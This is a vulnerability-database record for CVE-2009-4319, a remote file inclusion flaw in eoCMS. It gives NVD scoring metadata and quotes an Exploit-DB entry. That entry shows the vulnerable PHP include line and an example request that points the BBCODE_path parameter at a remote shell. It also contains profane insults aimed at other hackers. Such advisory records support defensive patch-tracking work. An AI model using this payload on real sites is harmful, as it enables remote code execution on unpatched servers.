ID CVE-2009-4319Type cveReporter cve@mitre.orgModified 2009-12-15T05:00:00
Description
PHP remote file inclusion vulnerability in js/bbcodepress/bbcode-form.php in eoCMS 0.9.03 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the BBCODE_path parameter.
{"id": "CVE-2009-4319", "bulletinFamily": "NVD", "title": "CVE-2009-4319", "description": "PHP remote file inclusion vulnerability in js/bbcodepress/bbcode-form.php in eoCMS 0.9.03 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the BBCODE_path parameter.", "published": "2009-12-14T21:17:00", "modified": "2009-12-15T05:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4319", "reporter": "cve@mitre.org", "references": ["http://www.exploit-db.com/exploits/10422", "http://secunia.com/advisories/37749"], "cvelist": ["CVE-2009-4319"], "type": "cve", "lastseen": "2020-12-09T19:31:24", "edition": 5, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:10422"]}], "modified": "2020-12-09T19:31:24", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-12-09T19:31:24", "rev": 2}, "vulnersScore": 6.8}, "cpe": ["cpe:/a:eocms:eocms:0.9.03"], "affectedSoftware": [{"cpeName": "eocms:eocms", "name": "eocms", "operator": "le", "version": "0.9.03"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:eocms:eocms:0.9.03:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:eocms:eocms:0.9.03:*:*:*:*:*:*:*", "versionEndIncluding": "0.9.03", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T12:27:52", "description": "eoCMS <= 0.9.03 Remote FIle Include Vulnerability. CVE-2009-4319. Webapps exploit for php platform", "published": "2009-12-14T00:00:00", "type": "exploitdb", "title": "eoCMS <= 0.9.03 - Remote FIle Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4319"], "modified": "2009-12-14T00:00:00", "id": "EDB-ID:10422", "href": "https://www.exploit-db.com/exploits/10422/", "sourceData": "# Exploit Title: eoCMS <= 0.9.03 Remote FIle Include Vulnerability\r\n# Date: 14-12-2009\r\n# Author: 1nd0n3s14n l4m3r\r\n# Software Link: http://eocms.com/index.php?act=plugin&id=4\r\n# Version: N/A\r\n# Tested on: GNU/LINUX\r\n# CVE : N/A\r\n# Code : N/A\r\n#####################################################################\r\n\r\n\r\n##########################################################################\r\n## eoCMS <= 0.9.03 Remote FIle Include Vulnerability ##\r\n## Created By 1nd0n3s14n l4m3r ##\r\n## (c) -- 14/12/2oo9 ##\r\n##########################################################################\r\n\r\n#####################################################################################\r\n## ~ Infected File : [bbcode-form.php] ##\r\n## ##\r\n## include_once($BBCODE_path . 'bbcodepress/bbcodepress-lite.php'); ##\r\n## $textarea_name = 'dataBox'; ##\r\n## $smiley_image_path = './images/emoticons/'; ##\r\n## $bbcode_image_path = './themes/' . $settings['site_theme'] . '/images/'; ##\r\n## ##\r\n## if(!$BBCODE_override){ ##\r\n## $head .= '<script language=JavaScript src=bbcodepress-lite.js></script>';##\r\n## $BBCODE_override = getStandard('./js/bbcodepress/'); ##\r\n## // $BBCODE_override = getStandard('./js/bbcodepress/','-eocms'); ##\r\n## } ##\r\n## ##\r\n## ~ Example : ##\r\n## ##\r\n## [path]/js/bbcodepress/bbcode-form.php?BBCODE_path=[Shell] ##\r\n## ##\r\n## ##\r\n#####################################################################################\r\n\r\n##############################################################################\r\n## ~ 9r33tZ T0 : > 4ll 1nd0n3s14n r34l h4ck3r ... ##\r\n## ~ fuck : > x-ace [ m0th3r fuck3r 1nd0n3s14n r34l sn1ch ] ##\r\n## > tomahawk [b19 l4m3rs] ##\r\n## > 1nd0n3s14n j00ml4 h4ck3r ##\r\n## ~ n0t3 : > sh0w m3 th3 c0d3 x-ace fuck3r 1f y0u r34l h4ck3r ##\r\n## y0u 4r3 n0t h4ck3r, y0u 4r3 r34l b1g l4m3rs ##\r\n##############################################################################\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10422/"}]}
